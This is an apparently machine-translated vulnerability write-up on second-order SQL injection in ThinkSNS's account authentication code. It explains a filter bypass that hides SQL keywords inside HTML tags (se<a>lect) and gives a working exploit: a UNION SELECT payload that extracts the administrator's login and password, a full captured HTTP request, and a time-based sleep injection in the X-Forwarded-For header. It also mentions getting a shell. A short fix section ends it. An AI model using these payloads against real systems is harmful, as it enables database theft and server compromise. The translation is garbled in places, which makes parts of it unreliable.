ThinkSNS injects Bypass twice to prevent arbitrary data.

ThinkSNS injects Bypass twice to prevent arbitrary data.

ThinkSNS injects Bypass twice to prevent arbitrary data.

Part 1: Vulnerability Analysis

File/apps/public/Lib/Action/AccountAction. class. php
 

/*** Submit the application for authentication ** @ return void */public function doAuthenticate () {$ verifyInfo = D ('user _ verified ')-> where ('uid = '. $ this-> mid)-> find (); $ data ['usergroup _ id'] = intval ($ _ POST ['usergroup _ id']); if (! $ Data ['usergroup _ id']) $ data ['usergroup _ id'] = 5; $ data ['company'] = t ($ _ POST ['company']); $ data ['realname'] = t ($ _ POST ['realname']); $ data ['idcard'] = t ($ _ POST ['idcard']); $ data ['phone'] = t ($ _ POST ['phone']); $ data ['reason '] = t ($ _ POST ['reason']); // $ data ['info'] = t ($ _ POST ['info']); $ data ['Attach _ id'] = t ($ _ POST ['Attach _ id']); // attach_ids filter if (D ('user _ verified_category ')-> where ('pid = '. $ data ['usergroup _ id'])-> find () {$ data ['user _ verified_category_id '] = intval ($ _ POST ['verifiedcategory']);} else {$ data ['user _ verified_category_id '] = 0;} $ Regx1 ='/^ [0-9] * $ /'; $ Regx2 = '/^ [A-Za-z0-9] * $ /'; $ Regx3 = '/^ [A-Za-z | \ x {4e00}-\ x {9fa5}] + $/U ';...... preg_match_all ('/. /us ', $ data ['reason'], $ matchs); // a Chinese character is also a character if (count ($ matchs [0])> 140) {// $ this-> error ('authentication reason cannot exceed 140 characters'); echo 'authentication reason cannot exceed 140 characters'; exit ;} // preg_match_all ('/. /us', $ data ['info'], $ match); // a Chinese character is also a character // if (count ($ match [0])> 140) {// $ this-> error ('the authentication material cannot exceed 140 characters'); //} if ($ verifyInfo) {$ data ['verified '] = 0; $ res = D ('user _ verified ')-> where ('uid = '. $ verifyInfo ['uid'])-> save ($ data); // data enters the database} else {$ data ['uid'] = $ this-> mid; $ res = D ('user _ verified ')-> add ($ data);} if ($ res) {// echo '1'; model ('your y ') -> sendpolicy ($ this-> mid, 'public _ account_doAuthenticate '); $ touid = D ('user _ group_link')-> where ('user _ group_id = 1 ') -> field ('uid')-> findAll (); foreach ($ touid as $ k => $ v) {model ('regiony ') -> sendpolicy ($ v ['uid'], 'verify _ audit ');} // return $ this-> ajaxReturn (null, 'application successful, please wait for review ', 1); echo '1';} else {// $ this-> error ("application failed"); echo 'application failed'; exit ;}}

At this time, attach_ids has already entered the database.

Next let's take a look at the warehouse picking location
 

/*** Apply for authentication ** @ return void */public function authenticate () {$ auType = model ('usergroup')-> where ('is _ authenticate = 1 ') -> findall (); $ this-> assign ('autype ', $ auType); $ verifyInfo = D ('user _ verified')-> where ('uid = '. $ this-> mid)-> find (); if ($ verifyInfo ['Attach _ id']) {$ a = explode ('| ', $ verifyInfo ['Attach _ id']); foreach ($ a as $ key => $ val) {if ($ val! = "") {$ AttachInfo = D ('Attach ')-> where ("attach_id = $ a [$ key]")-> find (); // attach_id enter the database $ verifyInfo ['attachment']. = $ attachInfo ['name']. '& nbsp; <a href = "'. getImageUrl ($ attachInfo ['Save _ path']. $ attachInfo ['Save _ name']). '"target =" _ blank "> download </a> <br/> ';}}}

We can see that after the attach_id is taken out, it is split by | and then counted into the database again.

There is no quotation mark protection, resulting in SQL injection.

So as long as we insert malicious data in attach_id, it will be triggered twice.



Part 2: bypass Analysis

To see if the t function can bypass

/Core/OpenSociax/functions. inc. php
 

/*** T function is used to filter tags and output clean text without html * @ param string text content * @ return string processed content */function t ($ text) {$ text = nl2br ($ text); $ text = real_strip_tags ($ text); $ text = addslashes ($ text); $ text = trim ($ text ); return $ text ;}

Here is a real_strip_tags function.
 

function real_strip_tags($str, $allowable_tags="") {    $str = html_entity_decode($str,ENT_QUOTES,'UTF-8');    return strip_tags($str, $allowable_tags);}

Here, html is filtered out.

In summary, when a malicious SQL statement enters t, the html Tag is first filtered and then entered addslashes.

Then we can insert html tags in the SQL keyword to bypass global defense.

For example, select = se <a> lect, which bypasses the global structure and finally changes to select.

1. log on to the front-end and apply for authentication at the Personal Information Department.
 

http://localhost/thinksns/index.php?app=public&mod=Account&act=Authenticate

2. When submitting the file, capture the packet and change attach_ids:
 

attach_ids=%7C76%7C-1 un<a>ion se<a>lect 1,2,3,4,5,6,7,(se<a>lect co<a>ncat(login,0x23,password) fr<a>om ts_user li<a>mit 1),9,10,11,12,13,14,15,16,17,18,19,20#%7C

The request is as follows:
 

Host: localhostUser-Agent: Mozilla/5.0 (Windows NT 6.1; rv:31.0) Gecko/20100101 Firefox/31.0Accept: */*Accept-Language: zh-cn,zh;q=0.8,en-us;q=0.5,en;q=0.3Accept-Encoding: gzip, deflateContent-Type: application/x-www-form-urlencoded; charset=UTF-8X-Requested-With: XMLHttpRequestReferer: http://localhost/thinksns/index.php?app=public&mod=Account&act=authenticateContent-Length: 156Cookie: CNZZDATA80862620=cnzz_eid%3D1277534265-1407229558-%26ntime%3D1411435759; bdshare_firstime=1407229707189; pgv_pvi=3674949632; cuz_auth=W25fXgRlUGYBbgdpB28EYFoyAmVSDgJnAg0CZgNjUT5VYQo7VzZXNFBmU2UBYQVhAj5SNFRiUTVXMAFkCGhUYFtpX2cENlBgATMHYgczBDVaNwIyUjcCYwI0Al8DMQ; cuz_userid=1; cuz_username=admin123; cej_username=admin123; cej_auth=fhtuNEBwVjcReA5jMQgdKnEVeklmPnVMWFpWYGMOA2RgBAJoVGReahoqJxI7Cg45R3dCcAw%2BX2dmDHVCVzooFH4cbg1AI1YxESUOaDFUHX9xEHoeZgd1SFhjVlljXA; cej_userid=1; PHPSESSID=2b74f139fdd6ec4d629fc2bce0a85e95; CNZZDATA1702264=cnzz_eid%3D2084647819-1413523648-http%253A%252F%252Flocalhost%252F%26ntime%3D1413523648; T3_online_update=1413552570; T3_TSV3_LOGGED_USER=fb8DZUmtTTQ17neIIPi6M7u8bJccMAEjX-Forwarded-For: 127.0.0.1',`email`=(if(mid(user(),1,1)=char(114),sleep(3),0))#Connection: keep-alivePragma: no-cacheCache-Control: no-cacheusergroup_id=&company=&realname=%E5%95%8A%E5%95%8A%E5%95%8A&idcard=111111111111111111&phone=13111111111&reason=111111&verifiedCategory=1&attach_ids=%7C76%7C-1 un<a>ion se<a>lect 1,2,3,4,5,6,7,(se<a>lect co<a>ncat(login,0x23,password) fr<a>om ts_user li<a>mit 1),9,10,11,12,13,14,15,16,17,18,19,20#%7C

3. Go Back To Step 1:

Access
 

http://localhost/thinksns/index.php?app=public&mod=Account&act=Authenticate

The Administrator account information is displayed in the authentication attachment:
 

Of course, if the conditions are met, GetShell is also OK.

Solution:

1. The condition following the where clause is protected

2. Rectification and defense Logic